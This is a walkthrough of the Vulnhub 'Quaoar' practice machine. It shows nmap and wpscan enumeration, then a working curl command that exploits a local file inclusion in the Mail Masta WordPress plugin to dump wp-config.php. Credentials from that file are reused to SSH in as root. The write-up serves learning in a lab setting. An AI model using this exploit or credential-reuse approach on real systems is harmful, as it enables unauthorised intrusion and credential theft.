Quaoar Vulnerable-Machine Walkthrough

Quaoar is a vulnerable virtual-machine available on Vulnhub.com. It is designed with beginners in mind, and doesn’t require the use of any advanced exploitation techniques.

ENUMERATION

I already knew Quaoar’s IP address(192.168.56.100), as it is displayed when the machine initially boots up. So I began with a standard nmap scan to see what services the machine was running:

nmap -Pn 192.168.56.100

Results:

Nmap scan report for 192.168.56.100
Host is up (0.00052s latency).
Not shown: 991 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
53/tcp  open  domain
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
993/tcp open  imaps
995/tcp open  pop3s
MAC Address: 08:00:27:7B:EB:52 (Oracle VirtualBox virtual NIC)

The http server running on port 80 immediately stood out to me, as web applications are a great place to look for low-hanging fruit. After doing a little manual prodding, I noticed that ‘robots.txt’ mentioned the /wordpress/ directory. When hunting for vulnerabilities, WordPress is always a great place to look.

So I decided to run wpscan and enumerate any plugins that may be vulnerable:

wpscan -u http://192.168.56.100/wordpress/ -e vp

Results(truncated):

[!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
    Reference: https://wpvulndb.com/vulnerabilities/8609
    Reference: https://cxsecurity.com/issue/WLB-2016080220
    Reference: https://www.exploit-db.com/exploits/40290/

[!] Title: Mail Masta 1.0 - Multiple SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8740
    Reference: https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6095
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6096
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6097
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6098

A WordPress plugin that has both SQL Injection and Local-file Inclusion vulnerabilities? Shocking.

EXPLOITATION

I began messing with the local file inclusion vulnerability and was able to view /etc/passwd, which was a great sign. However, after trying to look at ‘wp-config.php’, I kept getting a blank page returned. I realized the PHP code was executing instead of being displayed in the browser. The work-around? Base-64 encoding.

curl http://192.168.56.100/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php/?pl=php://filter/read=convert.base64-encode/resource=/var/www/wordpress/wp-config.php

This returned a nice block of base-64 encoded text. When decoded, I got this(truncated):

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

I noticed that the mySQL username was ‘root’, which was odd. On a whim, I tried using these credentials to SSH into the server:

root@windows-vista:~# ssh 192.168.56.100 -l root
root@192.168.56.100's password: 
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Tue Mar 28 19:47:10 EDT 2017

  System load:  0.0               Processes:             98
  Usage of /:   31.8% of 7.21GB   Users logged in:       0
  Memory usage: 23%               IP address for eth0:   192.168.56.100
  Swap usage:   0%                IP address for virbr0: 192.168.122.1

  Graph this data and manage this system at https://landscape.canonical.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sun Mar 26 19:47:06 2017
root@Quaoar:~#

And there we have it, root privileges.

FLAGS

The first flag I found was located in the root directory:

root@Quaoar:~# pwd
/root
root@Quaoar:~# cat flag.txt 
8e3f9ec016e3598c5eec11fd3d73f6fb
root@Quaoar:~#

I found the second flag in the ‘/home/wpadmin/’ directory with the help of the ‘locate’ command:

root@Quaoar:~# locate flag.txt
/home/wpadmin/flag.txt
/root/flag.txt
root@Quaoar:~# cat /home/wpadmin/flag.txt 
2bafe61f03117ac66a73c3c514de796e
root@Quaoar:~#

This machine has a third flag, but I wasn’t too interested in searching for it.

CONCLUSION

This was a quick and easy machine. After I finished, I read a few other write-ups and had realized I missed a pretty important detail: WordPress’ admin account used “admin:admin” credentials. Had I tried that first, I could have easily logged in to WordPress and used a PHP webshell to gain access to the server. However, in hindsight, it was more fun to exploit Mail Masta’s local file inclusion vulnerability and dump the wp-config.php file with the help of some base-64 encoding.

Thanks for reading!

Quaoar vulnerable machine from vulnhub.com